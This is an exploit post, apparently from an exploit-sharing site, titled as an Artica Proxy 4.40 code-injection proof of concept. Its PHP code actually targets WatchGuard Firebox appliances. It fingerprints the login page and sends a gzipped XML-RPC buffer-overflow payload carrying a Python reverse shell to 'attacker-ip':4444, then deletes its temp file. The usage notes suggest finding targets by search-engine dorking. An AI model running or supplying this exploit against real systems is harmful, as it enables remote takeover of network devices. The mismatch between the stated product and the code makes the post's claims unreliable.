=============================================================================================================================================
| # Title     : Artica Proxy appliance 4.40 Code Injection Vulnerability                                                                    |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://artica-proxy.com/                                                                                                   |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 97 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :


<?php
class WatchGuardExploit {
    private $targetUri;
    private $lhost;
    private $lport;
    private $shell;

    public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") {
        $this->targetUri = $targetUri;
        $this->lhost = $lhost;
        $this->lport = $lport;
        $this->shell = $shell;
    }

    public function sendRequest($method, $url, $data = null, $headers = []) {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

        if ($data) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }

        if (!empty($headers)) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        }

        $response = curl_exec($ch);
        curl_close($ch);

        return $response;
    }

    public function checkWatchGuardFirebox() {
        $url = $this->targetUri . '/auth/login';
        $response = $this->sendRequest('GET', $url, null, ['from_page' => '/']);
        
        if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false 
            && strpos($response, 'Firebox') !== false) {
            return true;
        }
        return false;
    }

    public function createBofPayload() {
        // Generate the buffer overflow payload with Python reverse shell code
        $randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric
        $pyFilename = "/tmp/" . $randomStr . ".py";
        $payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>";
        $payload .= str_repeat('<BBBBMFA>', 3680);

        // Include a Python reverse shell command as the payload
        $payload .= 'import socket;from subprocess import call; from os import dup2;';
        $payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);';
        $payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));';
        $payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);';
        $payload .= 'call(["' . $this->shell . '","-i"]);';
        $payload .= 'import os; os.remove("' . $pyFilename . '");';

        return gzencode($payload); // gzip encoding
    }

    public function exploit() {
        if (!$this->checkWatchGuardFirebox()) {
            echo "Target is not vulnerable.\n";
            return;
        }

        echo "Target is vulnerable. Sending exploit...\n";
        $bofPayload = $this->createBofPayload();

        // Send the buffer overflow payload
        $url = $this->targetUri . '/agent/login';
        $this->sendRequest('POST', $url, $bofPayload, [
            'Accept-Encoding: gzip, deflate',
            'Content-Encoding: gzip'
        ]);

        echo "Payload sent.\n";
    }
}

// Example usage:
$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);
$exploit->exploit();



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================